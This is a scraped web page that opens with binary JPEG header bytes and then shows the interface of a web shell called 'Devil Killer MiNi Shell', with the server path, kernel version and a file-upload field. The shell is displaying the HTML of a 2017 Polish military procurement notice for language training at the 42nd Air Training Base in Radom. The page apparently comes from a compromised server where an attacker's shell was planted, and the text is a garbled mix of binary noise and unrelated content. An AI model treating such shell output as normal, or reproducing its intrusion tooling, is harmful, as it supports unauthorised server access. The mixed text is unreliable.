JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170111/5935-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.42blsz.wp.mil.pl' target='_blank'>http://www.42blsz.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 5935 - 2017
              z dnia 2017-01-11 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Radom: Usługa szkolenia językowego dla kadry 42. Bazy Lotnictwa Szkolnego oraz jednostek będących na jej zaopatrzeniu w 2017 roku.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>42 Baza Lotnictwa Szkolnego, krajowy numer identyfikacyjny
              14267631600000, ul.
              ul. Sadków 
              9,
              26603  
              Radom, woj.
              mazowieckie, państwo
              Polska, tel.
              261 511 500, e-mail
              jw4938@wp.mil.pl, faks
              261 511 300.
              <br />
              Adres strony internetowej (URL): www.42blsz.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Wojskowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.42blsz.wp.mil.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.42blsz.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy składać wyłącznie w formie pisemnej<br />
                Adres:
                <br />42. Baza Lotnictwa Szkolnego, ul. Sadków 9, 26-603 Radom</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa szkolenia językowego dla kadry 42. Bazy Lotnictwa Szkolnego oraz jednostek będących na jej zaopatrzeniu w 2017 roku.<br /><b>Numer referencyjny: </b>2/PN/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest przeprowadzenie kształcenia językowego -  tj.: a)kursów języka angielskiego wg STANAG 6001: w części I - JW 3939 Sochaczew, w części II - JW 3934 Olszewnica , w części III  JW 1560 Sochaczew , w części IV - JW 3688 Sochaczew, w części V  JW 4938 Radom , zgodnie z normami:Ramowego  i Szczegółowego Programu Nauczania Języka Angielskiego w Jednostkach Podległych Dowódcy Generalnemu RSZ  - Poziom Podstawowy SPJ 1111 wg STANAG 6001; Sygn. Dow. Gen. 45/2016; Ramowego  i Szczegółowego Programu Nauczania Języka Angielskiego w Jednostkach Podległych Dowódcy Generalnemu RSZ  - Poziom Średniozaawansowany SPJ 2222 wg STANAG 6001; Sygn. Dow. Gen. 63/2016; Ramowego   Program Nauczania Języka Angielskiego w SZ RP edycja III / Poziomy 1- 3 wg STANAG 6001/ (wprowadzony Decyzją Nr 28 Dyrektora Departamentu Nauki i Szkolnictwa Wojskowego MON dnia 05.11. 2009 r.); Planu Kształcenia i Egzaminowania ze Znajomości Języków Obcych w Resorcie Obrony Narodowej na 2017 rok; Decyzji Nr 251/MON Ministra Obrony Narodowej z dnia 26 czerwca 2015 r. w sprawie kształcenia i egzaminowania ze znajomości języków obcych w resorcie obrony narodowej; b)  kursów języka rosyjskiego wg STANAG 6001: w części VI  JW. 3411 Grójec , zgodnie z normami:Ramowego  Programu Nauczania Języka Rosyjskiego w SZ RP według STANAG 6001 (edycja III, wprowadzony do użytku przez Dyrektora Departamentu Nauki  i Szkolnictwa   Wojskowego MON dnia 01.01.2010 r.);Planu Kształcenia i Egzaminowania ze Znajomości Języków Obcych w Resorcie Obrony Narodowej na 2017 rok;Decyzji Nr 251/MON Ministra Obrony Narodowej z dnia 26 czerwca 2015 r. w sprawie kształcenia i egzaminowania ze znajomości języków obcych w resorcie obrony narodowej.OGÓLNE WARUNKI ZAMÓWIENIA 1. Lektorzy muszą posiadać odpowiednie wykształcenie kierunkowe (magister filologii angielskiej/rosyjskiej lub lingwistyki stosowanej z zakresu języka angielskiego/rosyjskiego, lub licencjat nauczania języka angielskiego/rosyjskiego) dające kwalifikacje do nauczania języka angielskiego/rosyjskiego, jako języka obcego na wszystkich poziomach zaawansowania z przygotowaniem metodycznym, oraz min. 2  letnim udokumentowanym doświadczeniem w nauczaniu języka angielskiego/rosyjskiego; wymagana praktyka w pracy dydaktycznej z dorosłymi.2. Wykonawca zobowiązany jest zagwarantować po dwóch stałych lektorów zmieniających się co 3 (maksymalnie 4) godziny lekcyjne każdego dnia w każdej z grup szkoleniowych, lektora awaryjnego, który zastąpi stałych lektorów w razie choroby lub innych zdarzeń losowych oraz metodyka nauczania języka angielskiego/rosyjskiego (min. magister filologii angielskiej/rosyjskiej) do nadzoru nad pracą lektorów, nadzoru metodycznego, oraz oceny postępów słuchaczy. Metodyk ten zobowiązany jest również do przygotowania programów i diagramów szkolenia oraz ich ewentualnej korekty. Lektorzy muszą kontaktować się ze sobą w celu przekazania uwag dydaktycznych. Dla każdej grupy szkoleniowej zostanie wyznaczony starszy lektor  (osoba z dłuższym doświadczeniem w pracy) odpowiedzialny za pracę lektora młodszego, za grupę, dyscyplinę, organizację i prowadzenie zajęć, kontakt z wyznaczoną (przez JW) do nadzoru osobą, kontakt z kierownictwem firmy, itp. Młodszy lektor  wykonuje swoją pracę pod nadzorem lektora starszego.3. Wykonawca zobowiązany jest zapewnić w razie choroby lub innych zdarzeń losowych po wcześniejszej akceptacji Zamawiającego zamianę nie więcej niż jednego lektora dla grupy szkoleniowej na innego o kwalifikacjach i doświadczeniu nie mniejszym niż wykazanym w ofercie. 4. W sytuacjach szczególnych dopuszczalna jest zmiana wykładowcy, po uprzednim uzgodnieniu i zgodzie Zamawiającego. 5. Zamawiający nie ponosi kosztów związanych z dojazdem Wykonawcy/lektorów. 6. W terminie 2 dni roboczych od podpisania umowy Wykonawca skontaktuje się telefonicznie lub  osobiście  z wyznaczonym  przedstawicielem Zamawiającego w celu dokonania ustaleń merytorycznych (podręczniki, plany szkolenia, itp.). 7. Lektor zobowiązany jest stawić się na zajęcia najpóźniej 10 minut przed rozpoczęciem zajęć. 8. Kursy o wymiarze godzin lekcyjnych 240 oraz 590 zakończone będą egzaminem przeprowadzonym przez uprawnionych egzaminatorów wyznaczonych przez Komisję Języków Obcych DG RSZ (Dowództwa Generalnego Rodzajów Sił Zbrojnych), zaś kursy o wymiarze 120 godn lekcyjnych zakończą się egzaminem wewnętrznym udokumentowanym na piśmie 9.  Zamawiający zastrzega sobie jednostronne prawo do zmniejszenia liczby słuchaczy,  zmiany terminu kursu lub  całkowitego odwołania go. Za kurs lub godziny, które nie zostały zrealizowane Wykonawca nie będzie domagał się zapłaty, ani nie będzie domagał się z tego tytułu rekompensaty.10. W przypadku wystąpienia opóźnień w realizacji przyjętego programu kursów językowych dopuszcza się realizację zajęć w soboty lub w większym wymiarze dziennym  po wcześniejszym uzgodnieniu z wykonawcą.11. Wykonawca przystępujący przetargu zobowiązany jest załączyć  wykaz lektorów bezpośrednio realizujących zamówienie   wraz z ich dyplomami ukończenia studiów oraz innymi dokumentami (potwierdzonymi za zgodność z oryginałem, oraz opatrzone podpisem właściciela firmy), np.: umowy, zaświadczenia, referencje potwierdzające ich doświadczenie zawodowe. Wykaz powinien zawierać również dane oraz dokumenty metodyka nauczania języka rosyjskiego (min. 1  max 2).

<br /><br /><b>II.5) Główny kod CPV: </b>98300000-6<br /><b> Dodatkowe kody CPV:</b>80000000-4,
                80580000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/01/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca przedstawi:
1) wykaz wykonanych lub wykonywanych usług w okresie ostatnich 3 lat nie mniej niż 3 usługi: a) prowadzone w jednostkach lub instytucjach wojskowych przygotowujących do    egzaminów resortowych wg STANAG 6001 na poziomie 1, 2 i 3 z języka angielskiego / języka rosyjskiego; b) lub innych instytucjach (firmach, urzędach, itp.) w których zostały przeprowadzone szkolenia z języka angielskiego / języka rosyjskiego 
o minimalnym wymiarze jednego kursu 240 godzin lekcyjnych. W przypadku cz. I, II, III, IV, V referencje muszą dotyczyć usług z przeprowadzonych szkoleń  z j. angielskiego, zaś w przypadku cz. VI referencje muszą dotyczyć j. rosyjskiego. Referencje, zaświadczenia, poświadczenia itp. muszą być podpisane przez dowódców jednostek wojskowych, dyrektorów firm lub osób upoważnionych oraz opatrzone pieczęcią danej instytucji. Wykonawca zobowiązany do załączenia dokumentów potwierdzających, że w/w usługi zostały wykonane należycie (załącznik nr 7 do SIWZ);
2) Wykaz lektorów: a) w części I, III, IV, V, VI po 3 lektorów stałych (w tym: 2 lektorów przewidzianych do realizacji zamówienia i 1 lektor awaryjny oraz 1 lub 2 metodyków (max. branych będzie pod uwagę 2 metodyków nauczania j. angielskiego / j. rosyjskiego dla wszystkich wyszczególnionych kursów)) bezpośrednio realizujących usługę,b) w części II - 6 lektorów stałych (w tym: 2 lektorów przewidzianych do realizacji zamówienia i 1 lektor awaryjny w m. Olszewnica i 2 lektorów przewidzianych do realizacji zamówienia i 1 lektor awaryjny w m. Borzęcin oraz od 1 do 
2 metodyków (max. branych będzie pod uwagę 2 metodyków nauczania j. angielskiego dla wszystkich wyszczególnionych kursów dla m. Olszewnica 
i m. Borzęcin))  bezpośrednio realizujących usługę, wraz z ich dyplomami ukończenia studiów wyższych oraz dokumentami potwierdzającymi doświadczenie zawodowe z osobami dorosłymi (załącznik nr 8 do SIWZ). 
Jeżeli Wykonawca przystępuje do więcej niż jednej części zamówienia to zobowiązany jest załączyć  wykazy lektorów bezpośrednio realizujących zamówienie  oddzielnie dla każdej części - wraz z ich dyplomami ukończenia studiów oraz innymi dokumentami (potwierdzonymi za zgodność z oryginałem oraz opatrzone podpisem właściciela firmy), np.: umowy, zaświadczenia, referencje potwierdzające ich doświadczenie zawodowe. Wykaz powinien zawierać również dane oraz dokumenty metodyka nauczania języka angielskiego (min. 1  max 2).<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących dokumentów potwierdzających brak podstaw do wykluczenia Wykonawcy z postępowania:1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 8 ustawy; 2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 8 ustawy; 3) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie dokumentów potwierdzających spełnienie warunków udziału w postępowaniu na dzień składania ofert i aktualnych na dzień składania dokumentów:1) wykaz wykonanych lub wykonywanych usług w okresie ostatnich 3 lat nie mniej niż 3 usługi: a) prowadzone w jednostkach lub instytucjach wojskowych przygotowujących do egzaminów resortowych wg STANAG 6001 na poziomie 1, 2 i 3; b) lub innych instytucjach (firmach, urzędach, itp.) w których zostały przeprowadzone szkolenia z języka angielskiego / języka rosyjskiego o minimalnym wymiarze jednego kursu 240 godzin lekcyjnych;
W przypadku cz. I, II, III, IV, V referencje muszą dotyczyć usług z przeprowadzonych szkoleń  z j. angielskiego, zaś w przypadku cz. VI referencje muszą dotyczyć j. rosyjskiego. Referencje, zaświadczenia, poświadczenia itp. muszą być podpisane przez dowódców jednostek wojskowych, dyrektorów firm lub osób upoważnionych oraz opatrzone pieczęcią danej instytucji. Wykonawca zobowiązany do załączenia dokumentów potwierdzających, że w/w usługi zostały wykonane należycie (załącznik nr 7 do SIWZ).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie są wymagne</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 (Załącznik nr 6 do SIWZ). 2. Formularz ofertowy  załącznik nr 2 do SIWZ.3. Pełnomocnictwo udzielane osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.4. Zobowiązanie do udostępnienia zasobów- załącznik nr 9 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
